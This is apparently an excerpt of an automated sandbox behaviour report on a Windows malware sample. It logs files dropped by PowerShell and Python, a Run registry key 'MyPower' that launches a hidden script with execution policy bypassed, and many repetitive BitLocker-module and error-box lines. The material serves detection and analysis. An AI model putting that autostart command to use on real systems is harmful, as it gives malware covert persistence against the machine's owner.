Source: C:\Temp\PyEnv\python.exe	File created: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-64.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\pyexpat.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\libffi-8.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\libcrypto-3.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\python3.dll	Jump to dropped file
Source: C:\Temp\PyEnv\python.exe	File created: C:\Temp\PyEnv\Scripts\pip.exe	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Temp\PyEnv\LICENSE.txt

Jump to behavior

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyPower powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyPower			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyPower			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
